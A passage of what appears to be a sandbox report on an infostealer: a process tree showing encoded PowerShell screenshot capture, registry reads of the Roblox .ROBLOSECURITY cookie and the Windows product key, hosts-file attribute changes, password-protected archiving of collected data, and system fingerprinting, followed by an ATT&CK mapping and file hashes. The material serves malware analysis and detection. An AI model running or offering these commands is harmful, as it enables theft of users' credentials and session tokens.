AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2616
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g03kdytq\g03kdytq.cmdline"
        5⤵
        
        PID:4116
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACAB.tmp" "c:\Users\Admin\AppData\Local\Temp\g03kdytq\CSC3660F6E6E148421B84B7FD3D586D159F.TMP"
        6⤵
        
        PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:424
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1216
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4420
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:684
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4988
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:660
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1448
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28362\rar.exe a -r -hp"mudi" "C:\Users\Admin\AppData\Local\Temp\R9Y4T.zip" *"
    3⤵
    PID:3276
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\_MEI28362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI28362\rar.exe a -r -hp"mudi" "C:\Users\Admin\AppData\Local\Temp\R9Y4T.zip" *
      4⤵
      Executes dropped EXE
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0x118,0xf4,0x7ffce5f4cc40,0x7ffce5f4cc4c,0x7ffce5f4cc58
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2084 /prefetch:3
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
  2⤵
  PID:3828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3364,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3728,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:2676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4776,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8
  2⤵
  PID:2012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  PID:2632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4532 /prefetch:8
  2⤵
  PID:3580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4468 /prefetch:8
  2⤵
  PID:2684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5076,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:2
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5140,i,5744052594206745119,9358373361972771868,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:4520

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\6c34a130-a148-4272-a65f-5a97778fdae9.tmp

Filesize
234KB

MD5
66bc5e8cbea04b184e6ae114acc5ad8f

SHA1
2c263399f96765636c4293d015980483f8885472

SHA256
5a219391f2d2e6d6077a1a6a7fb45106036ba4f84e90ffb4898d6034e390d3c8

SHA512
f5aed608e56c9e4c43e7923145610f0711fdc80e76f25f09f92ebcac674af3d6a7612b696ed2d3718df2d75c3edae6262a1edc6cf1d781b885dd9ea19728e06d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
9b1db3e12888393c1c0fdc2db6f4eb5c

SHA1
e8be1ec3480eb6aa4ab9ef8591585b2d565f0c2b

SHA256
0091c5c629f11028db3b6cc62ce775bbce92bda7b7f986061a2bc9d24b519425

SHA512
e06afa0578de78947860ad399d917c5e18ce2e6204ffc337884835e6acdd7a6ad3a6d603092a8af69f94b2522ea317e219b515eb8899674c7a6493e158cee919

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
bc76ee7aaafc651e4f63f1855214dc61

SHA1
1bd8231b0ed6f50b167c187de7deca77b19e71cd

SHA256
ec6c1f9ad6dcaa232a4e5de1caf4c08ab281943e5065939dcdb61abaa38bec39

SHA512
f8415bf1decb4e1891eacd8f9ef639ab76de283d4f6b1cdfd547c0c18c0f2d70e3b1dff963472411204d754d4dfd6ce76b1d4b4861c5259e8a38c241f77b0534

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
de921108fd6fd11a676e706c2865a0f9

SHA1
59dd9b0a7c5f9631acd93fceb5523f24e85b032a

SHA256
bf76cd72a46c1f5cf9ed1cc6859c92bcb58308b85ec93d29d8b3cb11de4f56ab

SHA512
cbbe8e55507dbb82fd67b4ff1b64788093d109b8ea25de78876752dc1af0b790c252a5e64dfbcb267cf7bd4749b03fe21e6f493c65f1216425b7a788f0dbd816

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
f204acc8cc07b5887397aec111dff641

SHA1
75f059b453af38ffcc6c7cde397a354711d89214

SHA256
28ce63f07baaab933e525886de2e7595933a80324fdc730747b5ad932c30e81d

SHA512
c0052f8bb05af46460a93c2f0e70660ccf2161f9828a05138edd712a3c4e860d832ec5d33f947d723d7bafb6101e4f77f0bf799a58ad650e9349544ceb9cc94f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
